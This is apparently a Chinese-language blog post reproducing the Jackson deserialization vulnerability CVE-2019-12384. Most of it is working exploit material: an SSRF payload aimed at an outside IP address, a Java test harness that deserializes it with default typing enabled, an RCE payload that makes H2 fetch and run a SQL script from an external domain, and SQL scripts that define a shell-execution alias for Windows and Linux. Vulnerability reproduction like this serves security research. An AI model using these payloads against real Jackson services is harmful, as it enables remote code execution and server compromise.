Jackson CVE-2019-12384: 反序列化漏洞复现

未分类 Admin 5个月前 (07-23) 640次浏览 0个评论

文章参考:https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

环境搭建

引入jar包:
ssrf payload:
"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]"
Main方法:
import java.io.IOException;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;

public class Test {
	public static void main(String[] args) throws IOException {

	    String payload = "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\","
	    		+ " {\"url\":\"jdbc:h2:tcp://139.196.103.119:9999/test\"}]";
	    ObjectMapper mapper = new ObjectMapper();
	    mapper.enableDefaultTyping();
//	    mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
	    Object obj = mapper.readValue(payload, java.lang.Object.class);
	    mapper.writeValueAsString(obj);

	}
}

 

rce payload:
"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://www.a0xpg.com/inject_win.sql'\"}]";

 

inject_win.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"cmd", "/c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('calc')
inject_linux.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

 

喜欢 (1)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址